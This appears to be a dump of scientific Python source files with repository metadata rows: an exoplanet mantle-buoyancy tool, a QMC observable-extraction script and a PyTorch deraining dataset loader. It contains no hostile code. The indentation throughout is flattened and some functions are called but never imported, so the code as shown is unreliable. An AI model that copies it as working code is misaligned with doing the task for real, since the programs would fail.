norm_wt_feo, norm_wt_cr2o3, norm_wt_mgo, norm_wt_cao, norm_wt_na2o, norm_sum_nomgofix)
morb_debug.write("{}\n{}\n".format(md6_header, md6))
# mgo fix
norm_wt_mgo_fix = norm_wt_mgo * mgo_fix
norm_sum_mgofix = (norm_wt_sio2 + norm_wt_tio2 + norm_wt_al2o3 + norm_wt_feo + norm_wt_cr2o3 + norm_wt_mgo_fix +
norm_wt_cao + norm_wt_na2o)
md7_header = "7,mgo_fix,norm_wt_mgo_fx,norm_sum_mgofix"
md7 = ",{},{},{}".format(mgo_fix, norm_wt_mgo_fix, norm_sum_mgofix)
morb_debug.write("{}\n{}\n".format(md7_header, md7))
# normaized oxide wt% abundances --- what we want!
sio2_wtpct = (norm_wt_sio2 / norm_sum_mgofix) * 100
tio2_wtpct = (norm_wt_tio2 / norm_sum_mgofix) * 100
al2o3_wtpct = (norm_wt_al2o3 / norm_sum_mgofix) * 100
feo_wtpct = (norm_wt_feo / norm_sum_mgofix) * 100
cr2o3_wtpct = (norm_wt_cr2o3 / norm_sum_mgofix) * 100
mgo_wtpct = (norm_wt_mgo_fix / norm_sum_mgofix) * 100
cao_wtpct = (norm_wt_cao / norm_sum_mgofix) * 100
na2o_wtpct = (norm_wt_na2o / norm_sum_mgofix) * 100
sum_wtpct = (sio2_wtpct + tio2_wtpct + al2o3_wtpct + feo_wtpct + cr2o3_wtpct + mgo_wtpct + cao_wtpct + na2o_wtpct)
md8_header = "8,sio2,tio2,al2o3,feo,cr2o3,mgo,cao,na2o,sum"
md8 = ",{},{},{},{},{},{},{},{},{}".format(sio2_wtpct, tio2_wtpct, al2o3_wtpct, feo_wtpct,
cr2o3_wtpct, mgo_wtpct, cao_wtpct, na2o_wtpct, sum_wtpct)
morb_debug.write("{}\n{}\n".format(md8_header, md8))
chem_to_outfile = "{},{},{},{},{},{},{},{},{},{},{},{},{}\n".format(star_name, pressure, temperature, mass, sio2_wtpct,
tio2_wtpct, al2o3_wtpct, cr2o3_wtpct, feo_wtpct, mgo_wtpct, cao_wtpct, na2o_wtpct, sum_wtpct)
morb_recalc_outfile.write(chem_to_outfile)
except:
pass
morb_debug.close()
morb_recalc_outfile.close()
hefestofilewriter_morb(bulkfile="{}_MORB_Recalc_Bulkfile.csv".format(infilename), infilename=infilename)
def integrationloop2(hefestodir, runname):
# standard_depths = []
#
# model_sun_bsp_rho = [3.1399, 3.16644, 3.21129, 3.21993, 3.22843, 3.23679, 3.24503, 3.25316, 3.26117, 3.26909, 3.28169, 3.29415,
# 3.30499, 3.31476, 3.3238, 3.33232, 3.34046, 3.34832, 3.35595, 3.3634, 3.3707, 3.37788, 3.38495, 3.39193,
# 3.39884, 3.40567, 3.41244, 3.41916, 3.42582, 3.43244, 3.43902, 3.44557, 3.45208, 3.45857, 3.46504, 3.47149,
# 3.47794, 3.48438, 3.49083, 3.4973, 3.50379, 3.51032, 3.51783, 3.52856, 3.5352, 3.54193, 3.54876, 3.55574,
# 3.56291, 3.57035, 3.57813, 3.58638, 3.59525, 3.60495, 3.61577, 3.69282, 3.7338, 3.74885, 3.75742, 3.76575,
# 3.77393, 3.78203, 3.79015, 3.79837, 3.80676, 3.81424, 3.81873, 3.82321, 3.82768, 3.83213, 3.83656, 3.84098,
# 3.84538, 3.84977, 3.85831, 3.87594, 3.89625, 3.90832, 3.91254, 3.91675, 3.92094]
#
# model_sun_crust_rho = [2.89708, 2.92792, 2.94455, 3.04297, 3.17487, 3.19574, 3.25329, 3.36196, 3.37489,
# 3.38665, 3.39781, 3.40855, 3.43322, 3.4435, 3.45364, 3.46287, 3.47109, 3.47896, 3.4865,
# 3.49376, 3.50079, 3.50761, 3.51426, 3.52077, 3.52715, 3.53344, 3.53963, 3.54574, 3.55179,
# 3.55777, 3.56371, 3.5696, 3.57545, 3.58126, 3.58704, 3.59279, 3.66547, 3.67112, 3.67676,
# 3.68238, 3.68799, 3.69359, 3.69919, 3.70479, 3.71039, 3.71601, 3.72163, 3.72728, 3.73294,
# 3.73864, 3.74438, 3.75015, 3.75598, 3.76188, 3.76784, 3.77389, 3.78003, 3.78629, 3.79267,
# 3.79921, 3.80591, 3.8128, 3.81991, 3.82728, 3.83492, 3.84288, 3.85119, 3.85991, 3.86906,
# 3.8787, 3.88887, 3.89961, 3.91094, 3.9229, 3.9355, 3.94971, 3.97115, 3.99127, 4.01053,
# 4.02931, 4.04793]
#
# model_sun_delta_rho = [a - b for a, b in zip(model_sun_crust_rho, model_sun_bsp_rho)]
#
# lit_sun_bsp_rho = []
#
# lit_sun_crust_rho = [2.96748, 2.98934, 3.02871, 3.12504, 3.2649, 3.32414, 3.40401, 3.41811, 3.43281, 3.44608,
# 3.45855, 3.47031, 3.5037, 3.51281, 3.52141, 3.52955, 3.5373, 3.54472, 3.55187, 3.55881, 3.56557,
# 3.57218, 3.57866, 3.58505, 3.59134, 3.59757, 3.60373, 3.60984, 3.6159, 3.62192, 3.62791,
# 3.63387, 3.6398, 3.64571, 3.6516, 3.65749, 3.75811, 3.7639, 3.7697, 3.77549, 3.7813, 3.78712,
# 3.79296, 3.79882, 3.80472, 3.81065, 3.81662, 3.82265, 3.82874, 3.8349, 3.84114, 3.84747, 3.85391,
# 3.86047, 3.86718, 3.87404, 3.88108, 3.88832, 3.89579, 3.90353, 3.91157, 3.91994, 3.92868, 3.93784,
# 3.94746, 3.95758, 3.96823, 3.97945, 3.99123, 4.00355, 4.01639, 4.02969, 4.04339, 4.05801,
# 4.07212, 4.08535, 4.09777, 4.10947, 4.1205, 4.13093, 4.14081]
print("\n")
hefesto_dir = home_dir[0] + "/" + hefestodir
output_folder = home_dir[0] + "/{}_Buoyancy_Outputs".format(runname)
if os.path.exists(output_folder):
shutil.rmtree(output_folder)
else:
pass
os.mkdir(output_folder)
bsp_and_morb_dir = [] # BSP dir at index 0, MORB dir at index 1
for i in os.listdir(hefesto_dir):
if "BSP" in str(i):
bsp_and_morb_dir.append(str(hefesto_dir + "/" + i + "/fort.58"))
elif "MORB" in str(i):
bsp_and_morb_dir.append(str(hefesto_dir + "/" + i + "/fort.58"))
if len(bsp_and_morb_dir) != 2:
print("\n[X] The directory '{}' is not formatted properly!".format(hefesto_dir))
time.sleep(2)
initialization()
else:
print("\n[~] Found BSP HeFESTo File directory: '{}'!".format(bsp_and_morb_dir[0]))
print("[~] Found MORB HeFESTo File directory: '{}'!".format(bsp_and_morb_dir[1]))
if "{}_Integrated_Values.csv".format(runname) in os.listdir(home_dir[0]):
os.remove("{}_Integrated_Values.csv".format(runname))
integrated_output_file = open("{}_Integrated_Values.csv".format(runname), 'a')
integrated_output_file.write("Star,Net Buoyant Force,{}".format(",".join(str(i) for i in depth_trans_zone)))
print("\n[~] Initiating HeFESTo output file parsing...")
# planet_grav = (6.674*10**-11) * (planet_mass / planet_radius**2)
for i in os.listdir(bsp_and_morb_dir[0]):
star_name = i.replace("fort.58.control.", "").replace("_fort.58", "").replace("_bsp.txt_bsp", "").replace("fort.58_", "").replace("_fort58", "")
try:
for z in os.listdir(bsp_and_morb_dir[1]):
starname_morb = z.replace("fort.58.control.", "").replace("fort.58_", "").replace("_morb.txt_morb", "").replace("_fort.58", "").replace("_fort58", "")
if star_name ==starname_morb:
print("\n\n[~] Matched BSP and MORB files for star: {}".format(star_name))
os.chdir(bsp_and_morb_dir[0])
with open(i, 'r') as bsp_infile:
os.chdir(bsp_and_morb_dir[1])
with open(z, 'r') as morb_infile:
bsp_readfile = pd.read_fwf(bsp_infile, colspecs='infer')
morb_readfile = pd.read_fwf(morb_infile, colspecs='infer')
bsp_df = bsp_readfile.iloc[:, [1, 3]]
morb_df = morb_readfile.iloc[:, [1, 3]]
depths = []
bsp_rho = []
morb_rho = []
morb_minus_bsp_rho = []
integrated_values = []
for y in bsp_df['depth']:
depths.append(float(y))
for y in bsp_df['rho']:
bsp_rho.append(float(y))
for y in morb_df['rho']:
morb_rho.append(float(y))
bsp_infile.close()
morb_infile.close()
cur_index = 0
for q in morb_rho:
corresponding_bsp = bsp_rho[cur_index]
morb_minus_bsp_rho.append(corresponding_bsp - q)
# morb_minus_bsp_rho.append(q - corresponding_bsp)
cur_index += 1
# print("\nDEPTHS")
# print(depths)
# print("\nBSPRHO")
# print(bsp_rho)
# print("\nMORBRHO")
# print(morb_rho)
# print("\nDELTARHO")
# print(morb_minus_bsp_rho)
for t in range(len(morb_minus_bsp_rho) - 1):
x = depths[:(t + 2)]
y = morb_minus_bsp_rho[:(t + 2)]
# integrated_values.append(inte.simps(y, x))
integrated_values.append((inte.simps(y, x) * 1000 * 1000 * plate_thickness * gravity)) # Multiply by 1000 to account for g/cm^3 -> kg/m^3, and by 1000 again for depth km -> m.
# print("\nINTEVALS")
# print(integrated_values)
print("[~] Calculated a net buoyancy force of {} for star {}!".format(integrated_values[-1], star_name))
os.chdir(home_dir[0])
integrated_vals_formatted = ",".join(str(i) for i in integrated_values)
integrated_output_file.write("\n{},{},{}".format(star_name, str(integrated_values[-1]), integrated_vals_formatted))
except:
integrated_output_file.write("\n{},{}".format(star_name, "FAILURE"))
print("[X] Failed to calculate a net buoyancy force for star {}!".format(star_name))
integrated_output_file.close()
print("\n[~] Net buoyant force output file '{}' available in '{}'!".format("{}_Integrated_Values.csv".format(runname), home_dir[0]))
def visualize_outputs(integrated_output_file, runname):
os.chdir(home_dir[0])
print("\n[~] Preparing to plot integrated buoyancy force results...")
if os.path.exists("{}_Buoyancy_Force_Graphs".format(runname)):
shutil.rmtree("{}_Buoyancy_Force_Graphs".format(runname))
os.mkdir("{}_Buoyancy_Force_Graphs".format(runname))
loop_num = 1
integrated_output_file_df = pd.read_csv(integrated_output_file)
for row in integrated_output_file_df.index:
try:
integrated_buoyant_vals = []
star_name = integrated_output_file_df['Star'][row]
print("\n[~] Plotting integrated buoyancy force results for star: {}".format(star_name))
if "{}.png".format(star_name) in os.listdir(home_dir[0]):
os.remove(home_dir[0] + "/{}_Buoyancy_Force_Graphs/{}.png".format(runname, star_name))
buoyant_force = integrated_output_file_df['Net Buoyant Force'][row]
with open(integrated_output_file, 'r') as inte_output:
reader = csv.reader(inte_output)
for i, row in enumerate(reader):
if i == loop_num:
for z in row[2:]:
integrated_buoyant_vals.append(float(z))
loop_num += 1
inte_output.close()
plt.plot(depth_trans_zone[1:], integrated_buoyant_vals)
plt.title("{} Net Buoyant Forces".format(star_name))
plt.xlabel("Depth (km)")
plt.ylabel("Buoyant Force (N/m)")
plt.xlim(0, 574)
plt.grid()
plt.savefig("{}.png".format(star_name), format='png')
plt.close()
fdir = home_dir[0] + "/{}.png".format(star_name)
tdir = home_dir[0] + "/{}_Buoyancy_Force_Graphs/{}.png".format(runname, star_name)
shutil.move(fdir, tdir)
print("[~] Buoyant force plot for star {} available in directory '{}'!".format(star_name, tdir))
except:
print("[X] Failed to build a plot for star {}!".format(star_name))
print("\n[~] Thank you for using the Exoplanet Pocketknife!\n[~] Returning to main menu...")
time.sleep(2)
initialization()
def decideplot():
print("\n[~] Would you like to graph the integrated buoyancy force results?\nPlease enter 'y' or 'n' for 'yes' or 'no', respectively")
plot_input = raw_input(">>> ")
if plot_input == 'y':
visualize_outputs(integrated_output_file="{}_Integrated_Values.csv".format(runname), runname=runname)
elif plot_input == 'n':
print("\n[~] Thank you for using the Exoplanet Pocketknife!\nReturning to the main menu...")
time.sleep(2)
initialization()
else:
print("\n[X] Oops! That's not a valid command!")
time.sleep(2)
decideplot()
decideplot()
def initialization():
home_dir.append(os.getcwd())
# integrationloop2()
createbspenvfile()
createmorbenvfile()
print("\n_______________________________________________\n\n\n\n\n\n\n\n\n\n")
print("\n\n\nThe Exoplanet Pocketknife\nScott D. Hull, The Ohio State University 2015-2017\n")
print("This software is meant to work in conjunction with the methods described in 'The Prevalence of"
" Exoplanetary Plate Tectonics' (Unterborn et. al 2017).\nPlease refer to the article and "
"the documentation for more information.\n"
"\n*Any use of this software or the methods described in Unterborn et al. 2017 requires proper"
" citation.*\n\n")
# if "Star2Oxide_Output.csv" in os.listdir(os.getcwd()):
# os.remove("Star2Oxide_Output.csv")
# else:
# pass
# outputfile = open("Star2Oxide_Output.csv", 'a')
# time.sleep(1)
print("Enter:\n"
"'1' to raw_input [X/H] stellar abundances\n"
"'2' to raw_input stellar mole abundances\n"
"'3' to launch HeFESTo calculations\n"
"'4' to perform buoyancy force calculations & visualize\n"
"'o' for more options\n"
"'e' to exit the Exoplanet Pocketknife\n")
option1 = str(raw_input(">>> "))
if option1 == '1':
if "run_alphamelts.command" in os.listdir(os.getcwd()):
print("\nPlease enter your .csv formatted raw_input file with [X/H] stellar abundances:")
infile = str(raw_input(">>> "))
if infile in os.listdir(os.getcwd()):
print("\n[~] {} has been found in the working directory!".format(infile))
inputfile_list.append(infile)
# time.sleep(1)
logep(infile, infile_type='BSP', consol_file=False, init_path=(os.getcwd()), library=True)
else:
print("\n{} has NOT been found in the working directory!".format(infile))
initialization()
else:
print("\n[X] 'run_alphamelts.command' is not in the working directory!")
time.sleep(2)
initialization()
elif option1 == '2':
print("\nPlease enter your .csv formatted raw_input file with stellar mole abundances:")
infile = str(raw_input(">>> "))
if "run_alphamelts.command" in os.listdir(os.getcwd()):
if infile in os.listdir(os.getcwd()):
print("\n[~] {} has been found in the working directory!".format(infile))
inputfile_list.append(infile)
# time.sleep(1)
molepct(infile, infile_type='BSP', consol_file=False, init_path=(os.getcwd()) ,library=True)
else:
print("\n{} has NOT been found in the working directory!".format(infile))
initialization()
else:
print("\n[X] 'run_alphamelts.command' is not in the working directory!")
time.sleep(2)
initialization()
elif option1 == "3":
print("Please enter the name of the HeFESTo cumulative input file directory")
option3 = str(raw_input(">>> "))
print("What would you like to name this run?")
option4 = str(raw_input(">>> "))
if os.path.exists(home_dir[0] + "/{}".format(option3)):
runhefesto(infiledir=option3, actual_run=True, runname=option4)
else:
print("\n[X] '{}' does not exist in working directory: "
"'{}'!".format((home_dir[0] + "/{}".format(option3)), home_dir[0]))
time.sleep(2)
pass
elif option1 == "4":
print("\nPlease enter the name of your HeFESTo Output File directory...")
option5 = raw_input(">>> ")
if not os.path.exists(option5):
print("That directory does not exist in the working directory!")
time.sleep(2)
initialization()
realform_dir = home_dir[0] + "/" + option5
# if len(os.listdir(realform_dir)) != 2:
# print("\n[X] Warning! The HeFESTo directory '{}' is not properly formatted! (Length != 2, but is length {})".format(realform_dir, len(os.listdir(realform_dir))))
# for i in os.listdir(realform_dir):
# print(i)
# time.sleep(2)
# initialization()
print("What would you like to name this run?")
option6 = raw_input(">>> ")
integrationloop2(hefestodir=option5, runname=option6)
elif option1 == 'o':
print("\nPlease enter the letter of your choice. Would you like to: \n'a' Write a single file with MELTS raw_inputs\n"
"'b' Write a library of MELTS raw_input files\n'c' Write a library of HeFESTo raw input files\n"
"'d' Go back\n")
raw_input_help = raw_input(">>> ")
if raw_input_help == 'a':
print("\nEnter '1' to raw_input [X/H] stellar abundances or '2' to raw_input stellar mole abundances.")
raw_input_help2 = str(raw_input(">>> "))
if raw_input_help2 == "1":
print("\nPlease enter your .csv formatted raw_input file with [X/H] stellar abundances:")
infile = str(raw_input(">>> "))
if infile in os.listdir(os.getcwd()):
print("\n[~] {} has been found in the working directory!".format(infile))
inputfile_list.append(infile)
# time.sleep(1)
logep(infile, infile_type='file', consol_file=True, init_path=(os.getcwd()), library=False)
else:
print("{} has NOT been found in the working directory!\n".format(infile))
time.sleep(1)
initialization()
elif raw_input_help2 == "2":
print("\nPlease enter your .csv formatted raw_input file with stellar mole abundances:")
infile = str(raw_input(">>> "))
if infile in os.listdir(os.getcwd()):
print("\n[~] {} has been found in the working directory!".format(infile))
inputfile_list.append(infile)
# time.sleep(1)
molepct(infile, infile_type='file', consol_file=True, init_path=(os.getcwd()), library=False)
else:
print("\n{} has NOT been found in the working directory!".format(infile))
initialization()
else:
print("\n[X] Oops! That's not a valid command!\n")
time.sleep(1)
initialization()
elif raw_input_help == 'b':
print("\nEnter '1' to raw_input [X/H] stellar abundances or '2' to raw_input stellar mole abundances.")
raw_input_help2 = str(raw_input(">>> "))
if raw_input_help2 == "1":
print("\nPlease enter your .csv formatted raw_input file with [X/H] stellar abundances:")
infile = raw_input(">>> ")
if infile in os.listdir(os.getcwd()):
print("\n[~] {} has been found in the working directory!".format(infile))
inputfile_list.append(infile)
# time.sleep(1)
logep(infile, infile_type='file', consol_file=False, init_path=(os.getcwd()), library=True)
else:
print("{} has NOT been found in the working directory!\n".format(infile))
time.sleep(1)
initialization()
elif raw_input_help2 == "2":
print("\nPlease enter your .csv formatted raw_input file with stellar mole abundances:")
infile = str(raw_input(">>> "))
if infile in os.listdir(os.getcwd()):
print("\n[~] {} has been found in the working directory!".format(infile))
inputfile_list.append(infile)
# time.sleep(1)
molepct(infile, infile_type='file', consol_file=False, init_path=(os.getcwd()), library=True)
else:
print("\n{} has NOT been found in the working directory!".format(infile))
initialization()
else:
print("\n[X] Oops! That's not a valid command!\n")
time.sleep(1)
initialization()
elif raw_input_help == 'c':
runhefesto(actual_run=False)
elif raw_input_help == 'd':
initialization()
else:
print("\n[X] Oops! That's not a valid command!\n")
time.sleep(1)
initialization()
elif option1 == 'e':
print("\nThank you for using the Exoplanet Pocketknife!\n")
print("\n___________________________________________\n")
sys.exit()
else:
print("\n[X] Oops! {} is not a valid command!\n".format(option1))
time.sleep(1)
initialization()
initialization()
| 46.7689 | 207 | 0.541234 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 30,456 | 0.31158 |
9500f8ddc8a192d5b326bf23ad973aa2e9a8109b
| 4,074 |
py
|
Python
|
tools/extract_observable.py
|
pauxy-qmc/pauxy
|
1da80284284769b59361c73cfa3c2d914c74a73f
|
[
"Apache-2.0"
] | 16 |
2020-08-05T17:17:17.000Z
|
2022-03-18T04:06:18.000Z
|
tools/extract_observable.py
|
pauxy-qmc/pauxy
|
1da80284284769b59361c73cfa3c2d914c74a73f
|
[
"Apache-2.0"
] | 4 |
2020-05-17T21:28:20.000Z
|
2021-04-22T18:05:50.000Z
|
tools/extract_observable.py
|
pauxy-qmc/pauxy
|
1da80284284769b59361c73cfa3c2d914c74a73f
|
[
"Apache-2.0"
] | 5 |
2020-05-18T01:03:18.000Z
|
2021-04-13T15:36:29.000Z
|
#!/usr/bin/env python
'''Exctact element of green's function'''
import argparse
import sys
import numpy
import os
import pandas as pd
import json
_script_dir = os.path.abspath(os.path.dirname(__file__))
sys.path.append(os.path.join(_script_dir, 'analysis'))
import matplotlib.pyplot as plt
# from pauxy.analysis.extraction import analysed_itcf
# from pauxy.analysis.extraction import analysed_energies, extract_hdf5_simple
from pauxy.analysis.extraction import (
extract_mixed_estimates,
get_metadata
)
import matplotlib.pyplot as pl
def parse_args(args):
"""Parse command-line arguments.
Parameters
----------
args : list of strings
command-line arguments.
Returns
-------
options : :class:`argparse.ArgumentParser`
Command line arguments.
"""
parser = argparse.ArgumentParser(description = __doc__)
parser.add_argument('-s', '--spin', type=str, dest='spin',
default=None, help='Spin component to extract.'
'Options: up/down')
parser.add_argument('-t', '--type', type=str, dest='type',
default=None, help='Type of green\'s function to extract.'
'Options: lesser/greater')
parser.add_argument('-k', '--kspace', dest='kspace', action='store_true',
default=False, help='Extract kspace green\'s function.')
parser.add_argument('-e', '--elements',
type=lambda s: [int(item) for item in s.split(',')],
dest='elements', default=None,
help='Element to extract.')
parser.add_argument('-o', '--observable', type=str, dest='obs',
default='None', help='Data to extract')
parser.add_argument('-p', '--plot-energy', action='store_true', dest='plot',
default=False, help='Plot energy trace.')
parser.add_argument('-f', nargs='+', dest='filename',
help='Space-separated list of files to analyse.')
options = parser.parse_args(args)
if not options.filename:
parser.print_help()
sys.exit(1)
return options
def main(args):
"""Extract observable from analysed output.
Parameters
----------
args : list of strings
command-line arguments.
Returns
-------
results : :class:`pandas.DataFrame`
Anysed results.
"""
options = parse_args(args)
print_index = False
if options.obs == 'itcf':
results = analysed_itcf(options.filename[0], options.elements,
options.spin, options.type, options.kspace)
elif options.obs == 'energy':
results = analysed_energies(options.filename[0], 'mixed')
elif options.obs == 'back_propagated':
results = analysed_energies(options.filename[0], 'back_propagated')
elif 'correlation' in options.obs:
ctype = options.obs.replace('_correlation', '')
results = correlation_function(options.filename[0],
ctype,
options.elements)
print_index = True
elif options.plot:
data = extract_mixed_estimates(options.filename[0])
md = get_metadata(options.filename[0])
fp = md['propagators']['free_projection']
dt = md['qmc']['dt']
mc = md['qmc']['nsteps']
data = data[abs(data.Weight) > 0.0]
tau = numpy.arange(0,len(data)) * mc * dt
if fp:
pl.plot(tau, numpy.real(data.ENumer/data.EDenom))
pl.xlabel(r"$\tau$ (au)")
pl.ylabel(r"Energy (au)")
pl.show()
else:
pl.plot(tau, data[options.obs].real)
pl.xlabel(r"$\tau$ (au)")
pl.ylabel(r"{} (au)".format(options.obs))
pl.show()
else:
print ('Unknown observable')
if not options.plot:
print (results.to_string())
results.to_csv("%s"%options.obs)
if __name__ == '__main__':
main(sys.argv[1:])
| 33.393443 | 82 | 0.579774 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,317 | 0.32327 |
950130b7d174e4ab134e14783a96e2c70ef6e914
| 12,854 |
py
|
Python
|
datasets.py
|
shivakanthsujit/FMMRNet
|
12742398e3b981938a69e44b3f37d285904929b4
|
[
"MIT"
] | null | null | null |
datasets.py
|
shivakanthsujit/FMMRNet
|
12742398e3b981938a69e44b3f37d285904929b4
|
[
"MIT"
] | null | null | null |
datasets.py
|
shivakanthsujit/FMMRNet
|
12742398e3b981938a69e44b3f37d285904929b4
|
[
"MIT"
] | null | null | null |
import glob
import os
import albumentations as A
import kaggle
import numpy as np
import PIL
import pytorch_lightning as pl
import torch
from albumentations.pytorch import ToTensorV2
from torch.utils.data import random_split
from torch.utils.data.dataloader import DataLoader
from utils import show_images
def get_train_transforms(input_size=256):
return A.Compose(
[
A.RandomCrop(input_size, input_size),
A.HorizontalFlip(),
A.VerticalFlip(),
A.OneOf(
[
A.HueSaturationValue(
hue_shift_limit=0.2,
sat_shift_limit=0.2,
val_shift_limit=0.2,
p=0.9,
),
A.RandomBrightnessContrast(brightness_limit=0.2, contrast_limit=0.15, p=0.9),
],
p=0.9,
),
A.ToFloat(255),
ToTensorV2(),
],
additional_targets={"image1": "image"},
)
def get_valid_transforms(input_size=256):
return A.Compose(
[A.CenterCrop(input_size, input_size), A.ToFloat(255), ToTensorV2()],
additional_targets={"image1": "image"},
)
train_transform = get_train_transforms()
valid_transform = get_valid_transforms()
BATCH_SIZE = 4
SEED = 42
NUM_WORKERS = 4
kaggle.api.authenticate()
class BaseDataModule(pl.LightningDataModule):
def __init__(self, batch_size=BATCH_SIZE, seed=SEED, num_workers=NUM_WORKERS, on_gpu=True):
super().__init__()
self.batch_size = batch_size
self.seed = seed
self.num_workers = num_workers
self.on_gpu = on_gpu
def show_sample(self, split="train"):
assert split in ["train", "val", "test"], f"Invalid {split}"
if hasattr(self, f"{split}_data"):
loader = getattr(self, f"{split}_loader")()
print(f"No. of batches in {split}: ", len(loader))
x, y, z = next(iter(loader))
show_images(torch.cat((x, y, z)))
else:
print(f"Split {split} not found")
def train_dataloader(self):
return DataLoader(
self.train_data,
shuffle=True,
batch_size=self.batch_size,
num_workers=self.num_workers,
pin_memory=self.on_gpu,
)
def val_dataloader(self):
return DataLoader(
self.val_data,
shuffle=False,
batch_size=self.batch_size,
num_workers=self.num_workers,
pin_memory=self.on_gpu,
)
def test_dataloader(self):
return DataLoader(
self.test_data,
shuffle=False,
batch_size=self.batch_size,
num_workers=self.num_workers,
pin_memory=self.on_gpu,
)
def split_dataset(data, frac, seed):
assert isinstance(frac, float) and frac <= 1.0 and frac >= 0.0, f"Invalid fraction {frac}"
train_split = int(len(data) * frac)
val_split = len(data) - train_split
return random_split(data, [train_split, val_split], generator=torch.Generator().manual_seed(seed))
class JRDR(torch.utils.data.Dataset):
def __init__(self, root, type="Light", split="train", transform=train_transform):
self.root = root
self.data_dir = os.path.join(self.root, "rain_data_" + split + "_" + type)
if type == "Heavy" or split == "test":
self.rain_dir = os.path.join(self.data_dir, "rain/X2")
else:
self.rain_dir = os.path.join(self.data_dir, "rain")
self.norain_dir = os.path.join(self.data_dir, "norain")
self.files = glob.glob(self.rain_dir + "/*.*")
if len(self.files) == 0:
raise RuntimeError("Dataset not found.")
self.transform = transform
def get_file_name(self, idx):
img1 = self.files[idx]
_, img2 = os.path.split(img1)
img2 = img2.split("x2")[0] + ".png"
img2 = os.path.join(self.norain_dir, img2)
return img1, img2
def __getitem__(self, idx):
img1, img2 = self.get_file_name(idx)
rain_img = PIL.Image.open(img1)
norain_img = PIL.Image.open(img2)
if self.transform is not None:
rain_img, norain_img = np.array(rain_img), np.array(norain_img)
aug = self.transform(image=rain_img, image1=norain_img)
rain_img, norain_img = aug["image"], aug["image1"]
return rain_img, norain_img, rain_img - norain_img
def __len__(self):
return len(glob.glob(self.norain_dir + "/*.*"))
class JRDRDataModule(BaseDataModule):
"""
JRDR DataModule for PyTorch-Lightning
Learn more at https://pytorch-lightning.readthedocs.io/en/stable/extensions/datamodules.html
"""
def __init__(
self,
data_dir="data/",
dataset_type="Light",
train_transform=train_transform,
valid_transform=valid_transform,
batch_size=BATCH_SIZE,
seed=SEED,
num_workers=NUM_WORKERS,
on_gpu=True,
):
super().__init__(batch_size=batch_size, seed=seed, num_workers=num_workers, on_gpu=on_gpu)
self.data_dir = data_dir
self.train_transform = train_transform
self.valid_transform = valid_transform
self.type = dataset_type
def prepare_data(self):
dataset_dir = os.path.join(self.data_dir, "JRDR")
if not os.path.exists(dataset_dir):
kaggle.api.dataset_download_files("shivakanthsujit/jrdr-deraining-dataset", path=self.data_dir, unzip=True)
def setup(self, stage):
dataset_dir = os.path.join(self.data_dir, "JRDR")
data = JRDR(root=dataset_dir, type=self.type, split="train", transform=self.train_transform)
self.train_data, self.val_data = split_dataset(data, 0.8, self.seed)
self.test_data = JRDR(root=dataset_dir, type=self.type, split="test", transform=self.valid_transform)
class li_cvpr(torch.utils.data.Dataset):
def __init__(self, root, transform=valid_transform):
self.root = root
self.rain_files = sorted(glob.glob(self.root + "/*in.png"))
self.norain_files = sorted(glob.glob(self.root + "/*GT.png"))
if len(self.rain_files) == 0 or len(self.norain_files) == 0:
raise RuntimeError("Dataset not found.")
self.transform = transform
def get_file_name(self, idx):
img1 = self.rain_files[idx]
img2 = self.norain_files[idx]
return img1, img2
def __getitem__(self, idx):
img1, img2 = self.get_file_name(idx)
rain_img = PIL.Image.open(img1)
norain_img = PIL.Image.open(img2)
if self.transform is not None:
rain_img, norain_img = np.array(rain_img), np.array(norain_img)
aug = self.transform(image=rain_img, image1=norain_img)
rain_img, norain_img = aug["image"], aug["image1"]
return rain_img, norain_img, rain_img - norain_img
def __len__(self):
return len(self.rain_files)
class Rain12DataModule(BaseDataModule):
"""
Rain12 DataModule for PyTorch-Lightning
Learn more at https://pytorch-lightning.readthedocs.io/en/stable/extensions/datamodules.html
"""
def __init__(
self,
data_dir="data/",
train_transform=train_transform,
valid_transform=valid_transform,
batch_size=BATCH_SIZE,
seed=SEED,
num_workers=NUM_WORKERS,
on_gpu=True,
):
super().__init__(batch_size=batch_size, seed=seed, num_workers=num_workers, on_gpu=on_gpu)
self.data_dir = data_dir
self.train_transform = train_transform
self.valid_transform = valid_transform
def prepare_data(self):
kaggle.api.dataset_download_files("shivakanthsujit/li-cvpr-dataset", path=self.data_dir, unzip=True)
def setup(self, stage):
dataset_dir = os.path.join(self.data_dir, "Rain12")
if stage == "fit" or stage is None:
data = li_cvpr(root=dataset_dir, transform=self.train_transform)
self.train_data, self.val_data = split_dataset(data, 0.8, self.seed)
if stage == "test" or stage is None:
self.test_data = li_cvpr(root=dataset_dir, transform=self.valid_transform)
class IDGAN(torch.utils.data.Dataset):
def __init__(self, root, split="train", syn=True, transform=train_transform):
self.root = root
self.data_dir = os.path.join(self.root, "rain")
if split == "test":
self.rain_dir = os.path.join(self.data_dir, "test_syn")
else:
self.rain_dir = os.path.join(self.data_dir, "training")
self.norain_dir = self.rain_dir
self.files = glob.glob(self.rain_dir + "/*.*")
if len(self.files) == 0:
raise RuntimeError("Dataset not found.")
self.transform = transform
def get_file_name(self, idx):
img1 = self.files[idx]
_, img2 = os.path.split(img1)
img2 = img2.split("x2")[0] + ".png"
img2 = os.path.join(self.norain_dir, img2)
return img1, img2
def __getitem__(self, idx):
img1 = self.files[idx]
im = PIL.Image.open(img1)
w, h = im.size
norain_img = im.crop((0, 0, w // 2, h))
norain_img = np.array(norain_img)
rain_img = im.crop((w // 2, 0, w, h))
rain_img = np.array(rain_img)
if self.transform is not None:
rain_img, norain_img = np.array(rain_img), np.array(norain_img)
aug = self.transform(image=rain_img, image1=norain_img)
rain_img, norain_img = aug["image"], aug["image1"]
return rain_img, norain_img, rain_img - norain_img
def __len__(self):
return len(glob.glob(self.norain_dir + "/*.*"))
class IDCGANDataModule(BaseDataModule):
"""
IDCGAN DataModule for PyTorch-Lightning
Learn more at https://pytorch-lightning.readthedocs.io/en/stable/extensions/datamodules.html
"""
def __init__(
self,
data_dir="data/",
syn=True,
train_transform=train_transform,
valid_transform=valid_transform,
batch_size=BATCH_SIZE,
seed=SEED,
num_workers=NUM_WORKERS,
on_gpu=True,
):
super().__init__(batch_size=batch_size, seed=seed, num_workers=num_workers, on_gpu=on_gpu)
self.data_dir = data_dir
self.train_transform = train_transform
self.valid_transform = valid_transform
self.syn = syn
def prepare_data(self):
kaggle.api.dataset_download_files("shivakanthsujit/idgan-dataset", path=self.data_dir, unzip=True)
def setup(self, stage):
dataset_dir = os.path.join(self.data_dir, "IDGAN")
if stage == "fit" or stage is None:
